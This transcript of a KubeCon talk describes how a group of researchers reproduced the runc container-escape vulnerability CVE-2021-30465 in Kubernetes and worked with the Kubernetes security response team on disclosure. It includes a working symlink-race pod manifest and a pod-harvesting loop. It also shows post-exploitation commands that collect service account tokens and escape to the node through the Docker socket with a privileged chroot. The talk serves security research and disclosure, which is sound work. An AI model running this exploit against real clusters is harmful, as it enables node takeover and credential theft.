Hi, everybody. Welcome to KubeCon North America 2021. We're Sig Honk, a hacker crew, not an official Kubernetes SIG, and we're here to present a story for you about how we came across a runc vulnerability advisory. We flocked together to understand it, developed a proof of concept for Kubernetes for it, and shared our findings with the world. We are excited to get to share them with you. Hey, everybody. I'm Duffie Cooley, and I can be found everywhere as mauilion. I host This Week on Cloud Native on Cloud Native TV and eBPF office hours on YouTube. One of the big takeaways of this talk for me is that we all level each other up. It takes a village to move a project like Kubernetes forward, whether from the security perspective, writing and reviewing code, documentation, or the day-to-day release efforts, there are so many ways to get involved. Find the part that inspires you and jump in. Everyone is welcome here. We are going to present this story as a timeline. In the lower part of your screen, you're going to see word bubbles like this one show up, and those word bubbles are like the exchanges we passed back and forth as we explored this vulnerability. We're excited to take you with us on that journey. Hi, I'm Rory, and I go by raesene online. One of the challenges we all face in the cloud native world is its complexity, in terms of the number of overlapping projects that can be used in a cluster. Vulnerabilities can occur at any level of the stack and affect your overall environment. When you're examining a vulnerability, this complexity shows up as well. So if you're trying to prove a Kubernetes vulnerability, one question is, well, which Kubernetes distributions does this affect? There are well over 100 choices to test, and if a vulnerability affects all of them, or even just the most used ones, it can be a lot of work. Hey, everyone, I'm Brad Geesaman, and I'm sometimes a mischievous goose. As a security researcher, it's important to understand that discovering and creating the proof-of-concept exploit is just the beginning of a responsible disclosure process. If your goal is to get end users to patch as quickly as possible, you might need to take some extra steps to test the exploit on multiple different environments and provide those results in the disclosure. This can help convey a wider impact and impart the desired urgency to the vendor and community response teams. Without that extra supporting detail, the issue can often be underrated or even downplayed by the people triaging the disclosure. Hi, I'm Ian Coldwater. I'm co-chair of Kubernetes SIG Security. Security in the cloud native ecosystem is complex. Every container system is only as secure as every part of its stack. Everything is connected in the dependency chain, but different projects are responsible for different parts. Sometimes it can be hard to know who exactly is responsible for what, especially when things connect with multiple projects. How do we solve this? Like our dependencies, we connect and depend on each other. We all take responsibility for the security of the ecosystem. When we bring our different skills and perspectives to the ecosystem as a whole, we can see things we might not have spotted by ourselves. When we work together as a community, we get farther than we would working on our own. This story is one example of how it can look when different groups of people work together like that. Now, let's get into the timeline. Cool. 
So one of the fun problems in open source is trying to keep track of new information that is relevant to all the different projects that make up the ecosystem, as there are loads of places where interesting things might be discussed. Now, everyone will have their own approach to this, but my three main sources for Kubernetes and container-related security are Twitter, GitHub, and Slack. This story starts in one of those places, with a message that was sent to the SIG Security channel in Slack about a vulnerability in the runc project, originally found by Etienne Champetier: CVE-2021-30465. Vulnerabilities in runc are especially interesting as it has a key role in the container ecosystem. It's the tool that actually launches containers and is used as part of many other projects, like Docker, containerd, and CRI-O. Also, most cluster operators will never actually install runc directly and may not even realize they have it installed. After looking at the advisory, I had a quick look at the releases for projects that bundled runc, and noticed that both Docker and CRI-O were yet to release a patched version, although containerd had. This was pretty interesting to me because it meant that a large proportion of clusters were possibly still exposed to the issue. Now, of course, that doesn't mean much if it's not possible to exploit. But in the advisory, there was an intriguing mention that with Kubernetes, it might be possible to use this to gain access to the host file system of cluster nodes. Yeah, there was no proof-of-concept code included in the original advisory, but there was enough detail to understand that it was likely a widely applicable container escape. The write-up mentions Kubernetes and volume mounts as the point of attack, but it's not clear exactly how. So I asked the group if we should try to recreate a PoC ourselves. And I said, be the change we wish to see. Each of us brought our own perspectives to this. Brad wanted to know how it worked. I wanted to break it for fun. And Rory reminded us that we needed to raise awareness and figure out mitigations so that we could communicate that out to end users. And Duffie brought us together and herded all the cats. So first, I was really surprised by this one. I thought this was a very interesting CVE. And the first thing I did was create a HackMD and start gathering details. I pulled in the text from the CVE patch notes, I pulled in the text from the advisory, and then I started throwing up a couple of theories about how this would work. This document that I'm talking about is a shared document, and it will be part of the resources at the end of this presentation if you want to read through it. I was also thinking about how we could quickly iterate on something like this, because we needed an environment that all of us had access to where we could start playing with this and iterating on these things. For that environment, we chose to use kind. Kind is a subproject of Kubernetes and you can check it out at kind.sigs.k8s.io. It's used to actually test a lot of the Kubernetes code on pull requests, and it's also used to create lightweight Kubernetes clusters in Docker. And inside of each of the nodes, you'll have a version of runc just like you would on any other node inside of a Kubernetes cluster. And so that gave us a good opportunity to iterate on this stuff. 
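If you want to follow along, standing up a disposable test environment like the ones we used is quick. Here is a minimal sketch, assuming a kind node image whose bundled runc predates the fix; the cluster name and image tag are just illustrative, not the exact ones from our notes:

```bash
# Minimal sketch of a kind test environment (cluster name and node image tag
# are illustrative; pick an image whose bundled runc is older than 1.0.0-rc95).
kind create cluster --name honk-test --image kindest/node:v1.20.2

# Each kind "node" is just a Docker container with its own containerd and runc,
# so you can check which runc version you're iterating against:
docker exec honk-test-control-plane runc --version
```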
So often a great source of information about exploits for vulnerabilities is the blog posts of the people who discovered them. With that in mind, I went to see if Etienne had a post detailing how he'd found this issue. After finding there wasn't one up yet, although there were a load of other great write-ups on his blog, I decided to drop Etienne a cold email to see if there was anything more he could tell us. He very kindly responded quickly and provided some useful high-level information about how he'd exploited it, but not the full technical details. After all, who gives exploit code to random people who email you? Yeah. So I set up a call for us to collaborate on. Ian, Brad, and I jumped in. Rory was sleeping, as he's in Scotland, but these geese are globally distributed everywhere from Scotland to California. So we started working on figuring out how we wanted to approach creating a PoC for this, because all we really had was the vulnerability associated with runc and some notes from Etienne so far. As I copied and aggregated links, I began looking through the runc fix and the tests that were associated with it, and I have to say it didn't make a lot of sense to me. While Duffie was looking at the tests and the source code for that runc patch release, I was reading the patch notes on that fix, which were different from the notes on the advisory. These notes went into more detail, describing an order of operations for the attack, which gave us more insight as to how this exploit might work. The notes also called out that they thought it was an incomplete fix, that they thought there was probably more attack surface lurking there, specifically involving mount targets. That's always fun to read. What were they? How could they work? We started framing up what it would look like to exploit this. We knew it could be exploited with an emptyDir volume, based on the information that Rory had learned from Etienne. It's a big clue knowing that it had to be leveraging a TOCTOU, a time-of-check/time-of-use attack. We knew the what and the where, but we still needed to figure out the how. All of us were definitely out of our comfort zone a bit when trying to piece a vulnerability like this together enough to build an exploit. It's important that you don't get discouraged if this takes you out of your comfort zone. That's when you grow the most. This stuff is complex, just keep trying things. As you will see in the demonstration, it's kind of amazing that this stuff is found at all. It's true. The order of operations described in the advisory wasn't linear at all. It wasn't really in a kind of straightforward order, but it made intuitive sense to me because I don't really think linearly anyway. So with my ADHD brain, I was able to follow the order in the advisory, but that wasn't necessarily the case for all of us. We definitely didn't all understand it from the advisory. I tried to explain the order I understood from it. I kind of ended up sounding like conspiracy Charlie in that meme. Brad was like, hmm, I don't know about this, I'm just gonna go try and poke at it. Fair enough. I'm glad he did, because at the end of the day, I think it worked out better that way. If I had done it, I would have just ended up replicating the original PoC. Brad's differing approach got different results, and I think better ones. So as it happened, right after our initial Zoom call, there was a scheduled meeting of Kubernetes SIG Security. 
So it seemed like a good opportunity to check in with the rest of the SIG Security group and also the Kubernetes Product Security Committee members, now known as the Security Response Committee or SRC, who attended, to see if there were any plans to have some disclosure or awareness around this vulnerability. The feeling we got from the SRC was that Kubernetes has a lot of dependencies and they didn't feel the SRC could be in the position of being responsible for putting out security announcements around all of them. I don't know about this one. I love the folks on the SRC, my best friend Tabby Sable is on the SRC, but in this particular case, I was not at all sure this was the right call. Because while I understood that the SRC can't be responsible for all advisories in all third-party dependencies, there are in fact a lot of them, this one in particular said in the advisory that it would be easiest to leverage from within a Kubernetes environment. It called us out specifically. And so whether or not this one was technically our problem, it had become our problem. What did this thing do in a Kubernetes environment? We weren't really quite sure yet, but clearly it did something. We wanted to figure out how it worked and make sure end users would have the information they needed to know how to mitigate it. Based on the information we had, my theory was it could be a lot like the subpath symlink race approach from a 2017 CVE. So I wanted to give that approach a shot and share the feedback with the group. My hypothesis was it could be as simple as a single pod with two containers sharing two volumes. The first container starts and immediately goes into a never-ending loop replacing a specific folder with a symlink to root. The second container then starts up, but has the second volume pointing at that specific folder that container one is changing with a symlink, hoping that when it mounts, it follows that symlink and gets tricked into doing so. Knowing that this is attempting to win a race condition, I initially made this deployment with 20 replicas. I even tried 50 or 100, but 20 seemed reasonable as a balance to increase the number of chances of winning. After a lot of failed runs and frustration at not seeing anything mounted in that second volume path, I got lucky. At one point, I just happened to run a loop of kubectl execs to list the root directory of all the pods' file systems. As it quickly scrolled by, I just happened to notice that one of them had fewer directories than all the rest, and closer inspection revealed that it had the /kind directory. I remember thinking, why? After exec'ing in and poking around, I realized the container's root was mounted from the node's root file system, which was completely unexpected. Despite dozens of reruns, though, I really had a hard time replicating it. This makes sense, because race conditions are a notorious pain to exploit. They're finicky and they take a long time. You don't always get them. You have to keep trying and you have to wait. Sometimes it can be hard to tell if you even won the race successfully. And then when you have to do it again, they can be hard to reproduce. Yeah, it was quite irritating knowing that the race could be won, but reliability was still elusive. But a big reason for that was it didn't behave at all how we originally thought. So the first thing I wanted to do was share the fun and make sure that everyone else could replicate. 
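To make that eyeball check concrete, a loop like the one below is roughly what that looked like. This is a sketch, not the exact commands from our notes, and the label (app=honk) and container name (honk-one) are illustrative assumptions about how the racing pods are named:

```bash
# Sketch of the eyeball check: list / in every racing pod and look for the odd
# one out (a winner shows the node's root, e.g. a /kind directory on kind).
# The label selector and container name here are illustrative assumptions.
for pod in $(kubectl get pods -l app=honk -o name); do
  echo "== ${pod}"
  kubectl exec "${pod}" -c honk-one -- ls / 2>/dev/null
done
```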
So I updated the HackMD with the smallest possible working manifest and a little bit of instructions. What we had here was a TOCTOU vulnerability. Now, a TOCTOU (time-of-check to time-of-use) vulnerability is a class of software bug caused by a race condition between the checking of the state of part of a system, such as, in this case, sanitizing a path, and the use of the results of that check. What exactly does that mean here? Well, there is a check which happens during container startup, when volumes are mounted into that container, to ensure that the file system path is one which is allowed to be there. Our exploit was hitting a timing window between when the runc path sanitization is done and when the mount actually happens: we overwrite the path with a symlink in the volume of the first container and then mount that volume into a subsequent container in the same pod. When we win the race, our path points to the host root file system. So I was able to reproduce the work that Brad had done, and now we actually had a few of us able to reproduce it. And I decided to start working on a script that would enable us to bring this exploit to other environments and prove that this thing would work. Because so far, as Brad mentioned, the way he determined the success criteria was that he could see the /kind directory from the underlying host mounted in the container, and we needed to come up with something a little bit more portable. So I'm gonna walk you through the manifest here, and then we'll talk about exactly how we determined our success criteria and that sort of stuff. One of the first problems that we ran into was that the image pulls were starting to add up too much against Docker and the accounts we were using. And this was right around the time that Docker made the change to the number of image pulls you can make from a single endpoint. So what we decided to do was create a daemon set that would cache our image, the nginx:stable image, on all nodes. Then we would wait for that daemon set to land and be successful before deploying the deployment. The deployment actually holds the bits that we're going to use to try to recreate this TOCTOU attack. This deployment is made up of four containers. The first container is, again, using the nginx:stable image, and we have the imagePullPolicy set to Never. This way we can avoid that limitation of the Docker registry, because we're just going to use the nginx:stable image that's located right there on disk, laid down by the daemon set. What we're doing inside of that image is starting up a bash shell and passing it the following: we move into a directory that has been mounted from an emptyDir volume that we named honk, and then we go into a while-true loop where we're constantly deleting a file called host, if it exists, and then symlinking the root file system over that path. The intention is that if we're successful, then we should be able to see that root file system, but we'll see how it works out. The subsequent containers are named one honk, two honk, three honk, and these containers basically mount up and sleep forever. They mount that honk volume, and then they mount another volume on top of it, an emptyDir volume called host. And that path is the thing we're deleting and overwriting with that symlink. And so the timing attack is exactly that: for those three containers, in every replica of this deployment, we're racing the mount against that symlink swap. 
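For reference, here is a condensed sketch of the shape Duffie just described. The names, labels, and replica count are illustrative, the DaemonSet that pre-caches nginx:stable on every node and two of the three identical victim containers are omitted for brevity, and the real manifest lives in the HackMD linked in the resources at the end:

```bash
# Condensed sketch of the honk deployment (illustrative names; the caching
# DaemonSet and two of the three identical victim containers are omitted).
cat <<'EOF' | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: honk
spec:
  replicas: 10
  selector:
    matchLabels:
      app: honk
  template:
    metadata:
      labels:
        app: honk
    spec:
      containers:
      - name: swapper                 # container one: races the symlink swap
        image: nginx:stable
        imagePullPolicy: Never        # use the copy the DaemonSet already cached
        command: ["bash", "-c"]
        args:
        - cd /honk; while true; do rm -rf host; ln -s / host; done
        volumeMounts:
        - name: honk
          mountPath: /honk
      - name: honk-one                # honk-two and honk-three look the same
        image: nginx:stable
        imagePullPolicy: Never
        command: ["sleep", "infinity"]
        volumeMounts:
        - name: honk
          mountPath: /honk
        - name: host                  # mounted on top of the path being swapped
          mountPath: /honk/host
      volumes:
      - name: honk
        emptyDir: {}
      - name: host
        emptyDir: {}
EOF
```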
And here is the logic of the script, right? What we're doing is pulling a list of all of the running pods that are not in a terminated state. We sort them by creation timestamp and then we iterate through them doing this check. This was the most portable way we could figure out how to do this, because it works regardless of whether you're coming in as root or as a user. What it's doing is exec'ing into each pod and counting the number of process IDs we see under the proc file system. If it's more than five, then we have a success. If it's fewer than five, then we delete that pod, and the ReplicaSet controller replaces it. And as we work through the entire loop, we keep harvesting pods and maintaining a pool of pods until we actually find a successful exploit. This success criteria is in itself pretty telling, and we're going to get to play with that here in the demo, but we know that we're successful because we can see more PIDs in the proc file system than we should be able to see. This will be a fun one to explore. Okay, so let's see this in action. For this specific portable script that Duffie just went into great detail on, we need to be able to create daemon sets, deployments, and pods in the default namespace of a cluster. In my test environment here, I'm just showing you that it's Kubernetes 1.20.2, although the runc version, which we'll show you here in a second, is the most important part. So we have a one-node cluster running no special workloads. This is just the base installation. And on the worker nodes, and this is something you can do on your systems in your environment, run runc --version. What you want to see is 1.0.0-rc95 or later, or 1.0.1. If you see rc94 or lower, you're likely affected. What we're gonna do is run that script that Duffie just showed you. I'm gonna pass it 10 replicas because I'm running on a single-node cluster. What it's doing is creating that daemon set so that it caches that nginx:stable image, and then it goes and deploys that honk deployment with the number of replicas we talked about. The more replicas you have, the greater chance you have for success and the more opportunities there are for the race to be won. Then, with that last bit of logic Duffie showed, we walk through and check the number of PIDs in each one of them. If there are fewer than five, it says no; if there are more than five, it'll show success. So we're just gonna sit here and basically wait until it succeeds. This is a fun one also because, in this case, you're using minikube to test it. But I remember when we first found it, we were like, is this an artifact of having found this vulnerability in kind? Or did we actually find the one that is in runc? Yeah, it tended to land. In my testing, I think the quickest was three attempts, but I've had it land at 120-some attempts, somewhere in those ranges. Yeah, those are wide ranges, and sometimes you just leave it for hours and you come back and go, oh, I got one. And other times you'd look away and suddenly, oh, I've got one. And sometimes you just don't. Yeah, yeah, absolutely. We let it run. I think file system churn has a part to play in it too. 
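For reference, the harvesting loop Duffie described has roughly this shape. It's a sketch under the same illustrative label and container names as above, not our exact script, which is linked in the resources:

```bash
# Sketch of the harvest loop: keep checking each racing pod, treat "more than
# five PIDs visible in /proc" as a win, and recycle the losers so the
# ReplicaSet gives us fresh attempts. Label and container names are illustrative.
while true; do
  for pod in $(kubectl get pods -l app=honk \
      --field-selector=status.phase=Running \
      --sort-by=.metadata.creationTimestamp -o name); do
    pids=$(kubectl exec "${pod}" -c honk-one -- \
      sh -c 'ls -d /proc/[0-9]* 2>/dev/null | wc -l')
    if [ "${pids:-0}" -gt 5 ]; then
      echo "SUCCESS: ${pod} can see the node's /proc"
      exit 0
    fi
    kubectl delete "${pod}" --wait=false >/dev/null
  done
done
```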
Like if there's more file system churn happening on the underlying node, then I feel like it's a little bit more successful. Yeah, I remember leaving it to run; if it got past 500 attempts, we were pretty sure it wasn't gonna happen. Yeah. Tricky, proving a negative. Oh, nice. All right. I'm just gonna run this kubectl exec, and we're gonna exec into this pod. What I wanna show you is that if we run hostname, we're still inside the pod. We're still inside the container. So we're not quite there yet. It's a little bit weird; I'll explain why that is in a second. We're in the container's network namespace, so this is the pod's interface. But because we have access to the root file system and we're reading out of /proc, that's basically what ps is reading from, so we can see all of the PIDs. So let's pick one of these sleep infinities and try to kill it. And we actually can't kill it, because we're not in the host process namespace, although we are root. But that doesn't mean we're fully limited. We have root access to the file system, read-write access to the file system. There are plenty of things that we can do. One of the things we can do, because we know we're in a Kubernetes cluster, is leverage the secrets that are attached to the pods on this node. Let me scroll back up so you can see that command. We can do a find here, and we can look at all the tokens and the secrets that are mounted into pods running on this node. We could do this multiple times across multiple nodes and attempt to steal all the tokens in the cluster. So that's pretty dangerous. You might have a cluster-admin-bound token there in the first go. The other thing we could do is get the kubelet to run a workload for us. This is how minikube is running the Kubernetes components itself, but it'd be very easy to put a privileged hostPath pod right here and have the kubelet run it as a full root user. If you're a pen tester and you wanna leave backdoor access, you could add yourself to root's authorized_keys and get in that way. That's a nice, quick one. But also, we know we're potentially running on Docker if this command succeeds. Yep, we have access to the Docker socket. So we're just one step away from being able to get full access to the node. And what do I mean by full access to the node? I'm gonna run a utility called amicontained, written originally by Jessie Frazelle. We can see here that we have some capabilities, but we have several blocked syscalls. So this is enumerating what access I have. Am I contained? Yes, I'm running in Docker. But what syscalls do I have? What are potentially blocked? Okay. Like I said, we're one command away via a docker run. So let me paste this in. We're gonna run a privileged container in the host's network namespace and the host PID namespace. We're gonna mount the root volume again, but inside this container as /host, and then we're gonna chroot into it and run a bash shell. So this is effectively like, give me the full access, please. Now when we run hostname, we can see, yep, it's minikube. We look at all the interfaces; you can see all the interfaces of all the containers. And if we run a ps -ef, we can still see all the processes, but we can kill a process here if we want to. I'm not going to, just in case I kill the wrong one, but I'm gonna rerun amicontained. Okay. This time, yes, we technically are running inside of Docker, but we have full capabilities. We have SYS_ADMIN and all the other things that we need to do the damage. 
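For reference, the two moves Brad just demonstrated look roughly like this from inside the exploited pod, whose root is now the node's root file system. This is a sketch rather than the exact demo commands; the token path and the image used for the privileged container are illustrative assumptions:

```bash
# From inside the exploited pod (its / is now the node's /), harvest the
# service account tokens projected into every pod scheduled on this node:
find /var/lib/kubelet/pods -name token 2>/dev/null

# Then, since the node's Docker socket is reachable, one privileged container
# gets a real root shell on the node: host network and PID namespaces, the
# node's / bind-mounted at /host, and a chroot into it. Image is illustrative.
docker run --rm -it --privileged --net=host --pid=host \
  -v /:/host nginx:stable chroot /host bash
```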
And so that proves that we have the ability to leverage this into a full node takeover. This was wild, and frankly really alarming to us, because this exploit, as it appears in our PoC, gives the exploited pod read-write access to the host file system and a view of the host PID namespace. It's not a complete view, we can't kill processes directly, but we can harvest environment variables and interact with the root file system as the root user. In the demo, we leveraged that access to the Docker socket to get us to full root. We also learned during testing that this exploit is still successful even when you're not running the attack containers as root. The exploit still works because runc is following the symlink, but access to the file system is limited to that user. Because that's still enough access to list all the other user IDs on the node, we can rerun the attack for each of those user IDs and get their access one at a time. If any of those non-root users have passwordless sudo, full root access is still possible. I mentioned to my co-chair, Tabby Sable, what we were up to, and Tabby got curious. As we saw in the demo, we have the root FS and a view of the PIDs, and Tabby wanted to know what was up with the PID namespace. So Tabby reached out to Duffie with technical questions and they dug in a bit in a side exploration. Yeah, that was a fun chat with Tabby. We spent some time trying to dig through and understand which namespaces we were a part of and which we weren't, and really, at the end of the day, it seems to be quite simple, right? With that attack we saw in the deployment, and that we've covered a couple of different times, what we're actually doing is basically mounting a view of the node's root file system directly into the container's file system. And because of the pivot_root system call and the way that functions, that becomes kind of your new root. So effectively, when you exec into that exploited container, you're kind of chrooting right into that file system as it is presented to runc, because runc is the context from which root is mounted at that point, right? It's a binary running in the root file system of the underlying node, and when we told it to follow a symlink to the root file system in that volume, that's exactly what it did. And so the interesting part is, when you do a ps -ef, you see all those PIDs, but you're really just reading from the file system mount of /proc. The node's /proc is mounted into your file system; it's not your PID namespace, which is why we can't kill processes. So it was one of those interesting explorations into capabilities and things. Now, about a week later, Etienne released his PoC blog post publicly, which included his fully detailed exploit code and a full write-up. And that's when we learned that Ian's early understanding of the issue was spot on. Our approach ended up being similar, but with a very different outcome. Etienne's approach leveraged a small binary to do the symlink swapping, so a custom image was needed, but it tended to win the race a bit quicker, and it meant you could mount an arbitrary path from the node's file system inside the container in a subdirectory. In our approach, the manifest itself was a lot simpler, as we just used bash to do the symlink swapping, but we ended up with the node's entire root file system mounted as the container's root. 
Ours tends to take a bit longer to win the race, but the manifest was crafted in such a way that it didn't require a custom image. I mean, we used nginx:stable, but it could be any other base image that has the basic Linux utilities in it. And it would be accepted by admission control, aside from running as the root user to make that quick path to root. Yeah, so we tested this on various clouds and distributions to see what had or had not been patched, breaking it down and dividing up the work amongst all of us. One unusual thing we did notice during testing is that despite having a runc version which should have been affected, we couldn't get the exploit to work using Amazon's EKS distribution with the latest AMI. This provoked a bit of head scratching, but doing some research into the error messages we were getting, and also reading Etienne's original disclosure, which we'd received by that time, led us to realize that Amazon had put a mitigation in place by backporting the security fix without updating the runc version number. In general, this is something you need to watch for when you're doing vulnerability research and assessment, as backporting security patches is a technique used by quite a few vendors. It's also something you might want to watch out for if you're trying to figure out whether you've mitigated as an end user, because the version number might not actually tell you for sure. Sure. So when we were testing these things, we used the scientific method. We broke down the different cloud providers and the different versions of things they were running, and we tried them all to see if our hypothesis held. And what we found was that a lot of large clouds were vulnerable; a lot of default installs of major cloud provider services were exploitable. And we realized that this problem was really quite widespread, and likely a lot of cluster operators and end users were gonna be at risk. So to reiterate, we knew this exploit was a complete node takeover. We knew it could be even when you weren't running that container as root, and we knew that it wasn't patched in a lot of places. This was concerning. While we still weren't quite sure why this exploit worked the way it did, it was clear that it did. And it was bigger and nastier, we thought, than maybe we, or maybe even other people, had originally thought. I was growing increasingly concerned about the impact this thing might have and how many people might be at risk from it. And the response so far had been honestly far more nonchalant than I thought it needed to be. Vendors didn't seem to be terribly concerned about being quick to patch this thing, and a lot of end users might not even know that it existed. So what were we going to do about this? We figured, honestly, it might be kind of up to us. We needed to be the ones to help bring more information to users and to the ecosystem. As I said earlier, be the change we wish to see. So we reached out and disclosed this to the Kubernetes Security Response Committee, expressing that we thought this vulnerability's scope might be bigger than originally thought and that maybe more of a response might be needed. And the SRC actually responded really well. They responded right away, understood our concerns, and encouraged us to write a blog post on the Kubernetes blog about it, geared toward end users with mitigation advice. We did write this, but it took a while to get published because, as it turns out, the work around this vulnerability ended up being ongoing. 
So the SRC also, besides talking to us about that, talked amongst themselves. And a group of people from Google then went and continued this work, looking into this vulnerability and why exactly it was doing the thing it was doing. So they continued the research and, building upon our work, they found more. Looking at our work leveraging subpath mounts, they continued going down that path, and what they ended up finding was a completely new CVE, a vulnerability in the kubelet: CVE-2021-25741. This had a CVSS score of 8.8, making it the second most severe Kubernetes vulnerability to date. That exploit was released last month, or at least the vulnerability was. In the advisory for that vulnerability, Fabricio Voznika and Mark Walters from Google shouted us out and thanked Sig Honk for the thorough security research that led to them discovering this new vulnerability. We think that there's a lot to be learned from this story. We think that if we all work together, we can level each other up. At the end of the day, this talk is about working together, coming together as a community, and building upon each other's work so that we can figure out more, find more of what's going on, bring better information to end users, and make the ecosystem as a whole more secure. We think there's a lot to be learned from this, and we hope that we can all continue to do that. Yeah, absolutely. And the thing I took away from the story is just the sheer complexity of the cloud native ecosystem, both in terms of the vertical stack of software that's used when running Kubernetes and also the breadth of options available, and how that makes it hard for both researchers and cluster operators to understand where vulnerabilities lie and how they might impact their security. I think it's an important consideration for the community to keep focusing on communications and making sure that security information is as clear as possible, especially to users who may not spend all their time spelunking around projects like we do. Yeah, for me, there are a couple of things that are worth sharing about this journey. First, the appreciation of being able to work in a team where we all get to lean on each other's unique perspectives and abilities, and we all provide full encouragement of all honking activities. We got a little bit lucky, sure, but without that level of effective collaboration, I could easily imagine a scenario where we didn't overcome the confusing or frustrating parts, and there were plenty of those. And lastly, knowing that this team effort raised more awareness of the vulnerability and helped the main goal of getting vendors to release patches to end users quicker, I think that brings us all a lot of satisfaction. All of us played a part in this, and it was really fun to explore an interesting new attack together. Here is a slide with reference material. It'll take you to the links for the symlink script that we wrote, to our HackMD notes where we originally gathered context, and to the CVE documentation for both Etienne's vulnerability and the one that Ian referred to. Oh, and one more thing. Honk the planet! Thanks, everybody. Thank you, everyone. We're gonna post this slide in the Slack chat as well. We're gonna be here to answer your questions, and you might see a couple of us roaming around the halls at KubeCon, so see you all next time.